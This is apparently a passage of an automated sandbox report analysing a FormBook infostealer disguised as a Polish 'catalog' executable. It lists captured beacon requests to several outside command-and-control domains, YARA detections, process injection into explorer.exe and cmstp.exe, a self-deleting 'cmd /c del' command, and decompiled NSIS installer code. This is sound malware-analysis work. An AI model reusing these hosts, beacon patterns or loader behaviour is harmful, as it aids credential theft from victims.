                                                date: Thu, 04 Nov 2021 10:49:47 GMT
                                                server: LiteSpeed
                                                vary: User-Agent


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                6 | 192.168.2.6 | 49777 | 46.38.243.234 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:52.756943941 CET | 7571 | OUT | GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1
                                                Host: www.alles-abgedeckt.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:52.781173944 CET | 7571 | IN | HTTP/1.1 404 Not Found
                                                Date: Thu, 04 Nov 2021 10:48:29 GMT
                                                Server: Apache/2.4.10 (Debian)
                                                Content-Length: 285
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.alles-abgedeckt.com Port 80</address></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                7 | 192.168.2.6 | 49778 | 138.68.74.116 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:57.904726028 CET | 7572 | OUT | GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.leads-mania.club
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:57.947346926 CET | 7573 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Thu, 04 Nov 2021 10:49:57 GMT
                                                Server: Apache/2.4.18 (Ubuntu)
                                                Location: https://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0
                                                Content-Length: 432
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&amp;g2ML=crBLeffhPhH0">here</a>.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.leads-mania.club Port 80</address></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                8 | 192.168.2.6 | 49779 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:50:03.434360027 CET | 7574 | OUT | GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1
                                                Host: www.tankomixing.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:50:03.508599043 CET | 7576 | IN | HTTP/1.1 404 Not Found
                                                Date: Thu, 04 Nov 2021 10:50:03 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 2963
                                                Connection: close
                                                x-wix-request-id: 1636023003.449130355506120675
                                                Age: 0
                                                Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjVnh5Kklh0tOjeXRNYui2I,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalt5/ToY82z3f1Iadd1mDV+wfoIgWdv1pdEYpwcIu9suB3fKEXQvQlSAkB/lstal9R17zYLyYyrK+fg616qIKE8c=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,2+8df7/86SpxIBpm+VHpf+i/fkkIKkD/fZgnosx7etd9pAiCxHhredE3m8SaSeMp,l7Ey5khejq81S7sxGe5NkxC4MYanLpg+PuBnb2R7HRGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9y9YchCOVZDNGbMpBN9NeuuXxLvkVaG5VQb5mydxWWiYfoPtReGns7o6BqA+77AHvGQ2Otd3B2C27oTTIAKJtQ==
                                                Vary: Accept-Encoding
                                                X-Content-Type-Options: nosniff
                                                Server: Pepyaka/1.19.10
                                                Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robo
                                                Nov 4, 2021 11:50:03.508635998 CET | 7577 | IN
                                                Data Ascii: ts" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet
                                                Nov 4, 2021 11:50:03.508655071 CET | 7578 | IN
                                                Data Ascii: s/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.299.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl'


                                                System Behavior

                                                General

                                                Start time:11:47:59
                                                Start date:04/11/2021
                                                Path:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x400000
                                                File size:422298 bytes
                                                MD5 hash:CBE0E49106FAD96B2C1C155CE5B22ABD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:11:48:01
                                                Start date:04/11/2021
                                                Path:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x400000
                                                File size:422298 bytes
                                                MD5 hash:CBE0E49106FAD96B2C1C155CE5B22ABD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:11:48:05
                                                Start date:04/11/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6f22f0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:11:48:30
                                                Start date:04/11/2021
                                                Path:C:\Windows\SysWOW64\cmstp.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                Imagebase:0xd0000
                                                File size:82944 bytes
                                                MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Start time:11:48:35
                                                Start date:04/11/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:11:48:36
                                                Start date:04/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                  Executed Functions

                                                  C-Code - Quality: 78%
                                                  			_entry_() {
                                                  				intOrPtr _t47;
                                                  				CHAR* _t51;
                                                  				char* _t54;
                                                  				CHAR* _t56;
                                                  				void* _t60;
                                                  				intOrPtr _t62;
                                                  				int _t64;
                                                  				char* _t67;
                                                  				char* _t68;
                                                  				int _t69;
                                                  				char* _t71;
                                                  				char* _t74;
                                                  				intOrPtr _t87;
                                                  				int _t91;
                                                  				intOrPtr _t93;
                                                  				void* _t95;
                                                  				void* _t107;
                                                  				intOrPtr* _t108;
                                                  				char _t111;
                                                  				CHAR* _t116;
                                                  				char* _t117;
                                                  				CHAR* _t118;
                                                  				char* _t119;
                                                  				void* _t121;
                                                  				char* _t123;
                                                  				char* _t125;
                                                  				char* _t126;
                                                  				void* _t128;
                                                  				void* _t129;
                                                  				intOrPtr _t138;
                                                  				char _t147;
                                                  
                                                  				 *(_t129 + 0x20) = 0;
                                                  				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                  				 *(_t129 + 0x1c) = 0;
                                                  				 *(_t129 + 0x18) = 0x20;
                                                  				SetErrorMode(0x8001); // executed
                                                  				if(GetVersion() != 6) {
                                                  					_t108 = E00405F57(0);
                                                  					if(_t108 != 0) {
                                                  						 *_t108(0xc00);
                                                  					}
                                                  				}
                                                  				_t118 = "UXTHEME";
                                                  				goto L4;
                                                  				while(1) {
                                                  					L22:
                                                  					_t111 =  *_t56;
                                                  					_t134 = _t111;
                                                  					if(_t111 == 0) {
                                                  						break;
                                                  					}
                                                  					__eflags = _t111 - 0x20;
                                                  					if(_t111 != 0x20) {
                                                  						L10:
                                                  						__eflags =  *_t56 - 0x22;
                                                  						 *((char*)(_t129 + 0x14)) = 0x20;
                                                  						if( *_t56 == 0x22) {
                                                  							_t56 =  &(_t56[1]);
                                                  							__eflags = _t56;
                                                  							 *((char*)(_t129 + 0x14)) = 0x22;
                                                  						}
                                                  						__eflags =  *_t56 - 0x2f;
                                                  						if( *_t56 != 0x2f) {
                                                  							L20:
                                                  							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
                                                  							__eflags =  *_t56 - 0x22;
                                                  							if(__eflags == 0) {
                                                  								_t56 =  &(_t56[1]);
                                                  								__eflags = _t56;
                                                  							}
                                                  							continue;
                                                  						} else {
                                                  							_t56 =  &(_t56[1]);
                                                  							__eflags =  *_t56 - 0x53;
                                                  							if( *_t56 == 0x53) {
                                                  								__eflags = (_t56[1] | 0x00000020) - 0x20;
                                                  								if((_t56[1] | 0x00000020) == 0x20) {
                                                  									_t14 = _t129 + 0x18;
                                                  									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
                                                  									__eflags =  *_t14;
                                                  								}
                                                  							}
                                                  							__eflags =  *_t56 - 0x4352434e;
                                                  							if( *_t56 == 0x4352434e) {
                                                  								__eflags = (_t56[4] | 0x00000020) - 0x20;
                                                  								if((_t56[4] | 0x00000020) == 0x20) {
                                                  									_t17 = _t129 + 0x18;
                                                  									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
                                                  									__eflags =  *_t17;
                                                  								}
                                                  							}
                                                  							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
                                                  							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
                                                  								 *((intOrPtr*)(_t56 - 2)) = 0;
                                                  								_t57 =  &(_t56[2]);
                                                  								__eflags =  &(_t56[2]);
                                                  								E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t57);
                                                  								L25:
                                                  								_t116 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                  								GetTempPathA(0x400, _t116);
                                                  								_t60 = E004030F9(_t134);
                                                  								_t135 = _t60;
                                                  								if(_t60 != 0) {
                                                  									L27:
                                                  									DeleteFileA("1033"); // executed
                                                  									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
                                                  									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
                                                  									if(_t62 != 0) {
                                                  										L37:
                                                  										E00403540();
                                                  										__imp__OleUninitialize();
                                                  										_t143 =  *((intOrPtr*)(_t129 + 0x10));
                                                  										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
                                                  											__eflags =  *0x42ecb4; // 0x0
                                                  											if(__eflags == 0) {
                                                  												L64:
                                                  												_t64 =  *0x42eccc; // 0xffffffff
                                                  												__eflags = _t64 - 0xffffffff;
                                                  												if(_t64 != 0xffffffff) {
                                                  													 *(_t129 + 0x1c) = _t64;
                                                  												}
                                                  												ExitProcess( *(_t129 + 0x1c));
                                                  											}
                                                  											_t126 = E00405F57(5);
                                                  											_t119 = E00405F57(6);
                                                  											_t67 = E00405F57(7);
                                                  											__eflags = _t126;
                                                  											_t117 = _t67;
                                                  											if(_t126 != 0) {
                                                  												__eflags = _t119;
                                                  												if(_t119 != 0) {
                                                  													__eflags = _t117;
                                                  													if(_t117 != 0) {
                                                  														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
                                                  														__eflags = _t74;
                                                  														if(_t74 != 0) {
                                                  															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
                                                  															 *(_t129 + 0x3c) = 1;
                                                  															 *(_t129 + 0x48) = 2;
                                                  															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  											_t68 = E00405F57(8);
                                                  											__eflags = _t68;
                                                  											if(_t68 == 0) {
                                                  												L62:
                                                  												_t69 = ExitWindowsEx(2, 0x80040002);
                                                  												__eflags = _t69;
                                                  												if(_t69 != 0) {
                                                  													goto L64;
                                                  												}
                                                  												goto L63;
                                                  											} else {
                                                  												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
                                                  												__eflags = _t71;
                                                  												if(_t71 == 0) {
                                                  													L63:
                                                  													E0040140B(9);
                                                  													goto L64;
                                                  												}
                                                  												goto L62;
                                                  											}
                                                  										}
                                                  										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
                                                  										ExitProcess(2);
                                                  									}
                                                  									_t138 =  *0x42ec3c; // 0x0
                                                  									if(_t138 == 0) {
                                                  										L36:
                                                  										 *0x42eccc =  *0x42eccc | 0xffffffff;
                                                  										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
                                                  										goto L37;
                                                  									}
                                                  									_t123 = E004056E5(_t125, 0);
                                                  									while(_t123 >= _t125) {
                                                  										__eflags =  *_t123 - 0x3d3f5f20;
                                                  										if(__eflags == 0) {
                                                  											break;
                                                  										}
                                                  										_t123 = _t123 - 1;
                                                  										__eflags = _t123;
                                                  									}
                                                  									_t140 = _t123 - _t125;
                                                  									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
                                                  									if(_t123 < _t125) {
                                                  										_t121 = E0040540F(_t143);
                                                  										lstrcatA(_t116, "~nsu");
                                                  										if(_t121 != 0) {
                                                  											lstrcatA(_t116, "A");
                                                  										}
                                                  										lstrcatA(_t116, ".tmp");
                                                  										_t127 = "C:\\Users\\engineer\\Desktop";
                                                  										if(lstrcmpiA(_t116, "C:\\Users\\engineer\\Desktop") != 0) {
                                                  											_push(_t116);
                                                  											if(_t121 == 0) {
                                                  												E004053F2();
                                                  											} else {
                                                  												E00405375();
                                                  											}
                                                  											SetCurrentDirectoryA(_t116);
                                                  											_t147 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                                                  											if(_t147 == 0) {
                                                  												E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t127);
                                                  											}
                                                  											E00405BC7(0x42f000,  *(_t129 + 0x20));
                                                  											 *0x42f400 = 0x41;
                                                  											_t128 = 0x1a;
                                                  											do {
                                                  												_t87 =  *0x42ec30; // 0x79ee58
                                                  												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
                                                  												DeleteFileA(0x428c58);
                                                  												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
                                                  													_t91 = CopyFileA("C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe", 0x428c58, 1);
                                                  													_t149 = _t91;
                                                  													if(_t91 != 0) {
                                                  														_push(0);
                                                  														_push(0x428c58);
                                                  														E00405915(_t149);
                                                  														_t93 =  *0x42ec30; // 0x79ee58
                                                  														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
                                                  														_t95 = E00405427(0x428c58);
                                                  														if(_t95 != 0) {
                                                  															CloseHandle(_t95);
                                                  															 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                  														}
                                                  													}
                                                  												}
                                                  												 *0x42f400 =  *0x42f400 + 1;
                                                  												_t128 = _t128 - 1;
                                                  												_t151 = _t128;
                                                  											} while (_t128 != 0);
                                                  											_push(0);
                                                  											_push(_t116);
                                                  											E00405915(_t151);
                                                  										}
                                                  										goto L37;
                                                  									}
                                                  									 *_t123 = 0;
                                                  									_t124 =  &(_t123[4]);
                                                  									if(E0040579B(_t140,  &(_t123[4])) == 0) {
                                                  										goto L37;
                                                  									}
                                                  									E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
                                                  									E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
                                                  									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                  									goto L36;
                                                  								}
                                                  								GetWindowsDirectoryA(_t116, 0x3fb);
                                                  								lstrcatA(_t116, "\\Temp");
                                                  								_t107 = E004030F9(_t135);
                                                  								_t136 = _t107;
                                                  								if(_t107 == 0) {
                                                  									goto L37;
                                                  								}
                                                  								goto L27;
                                                  							} else {
                                                  								goto L20;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						goto L9;
                                                  					}
                                                  					do {
                                                  						L9:
                                                  						_t56 =  &(_t56[1]);
                                                  						__eflags =  *_t56 - 0x20;
                                                  					} while ( *_t56 == 0x20);
                                                  					goto L10;
                                                  				}
                                                  				goto L25;
                                                  				L4:
                                                  				E00405EE9(_t118); // executed
                                                  				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
                                                  				if( *_t118 != 0) {
                                                  					goto L4;
                                                  				} else {
                                                  					E00405F57(0xd);
                                                  					_t47 = E00405F57(0xb);
                                                  					 *0x42ec24 = _t47;
                                                  					__imp__#17();
                                                  					__imp__OleInitialize(0); // executed
                                                  					 *0x42ecd8 = _t47;
                                                  					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
                                                  					E00405BC7("egkwshqw Setup", "NSIS Error");
                                                  					_t51 = GetCommandLineA();
                                                  					_t125 = "\"C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe\" ";
                                                  					E00405BC7(_t125, _t51);
                                                  					 *0x42ec20 = GetModuleHandleA(0);
                                                  					_t54 = _t125;
                                                  					if("\"C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe\" " == 0x22) {
                                                  						 *((char*)(_t129 + 0x14)) = 0x22;
                                                  						_t54 =  &M00434001;
                                                  					}
                                                  					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
                                                  					 *(_t129 + 0x20) = _t56;
                                                  					goto L22;
                                                  				}
                                                  			}



































                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403150
                                                  • GetVersion.KERNEL32 ref: 00403156
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                  • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                  • OleInitialize.OLE32(00000000), ref: 004031A7
                                                  • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                  • GetCommandLineA.KERNEL32(egkwshqw Setup,NSIS Error), ref: 004031D8
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000), ref: 004031EB
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00409168), ref: 00403216
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                  • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                  • OleUninitialize.OLE32(00000020), ref: 00403366
                                                  • ExitProcess.KERNEL32 ref: 00403386
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000,00000020), ref: 00403399
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000,00000020), ref: 004033A8
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000,00000020), ref: 004033B3
                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000,00000020), ref: 004033BF
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                  • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,00428C58,00000001), ref: 00403439
                                                  • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
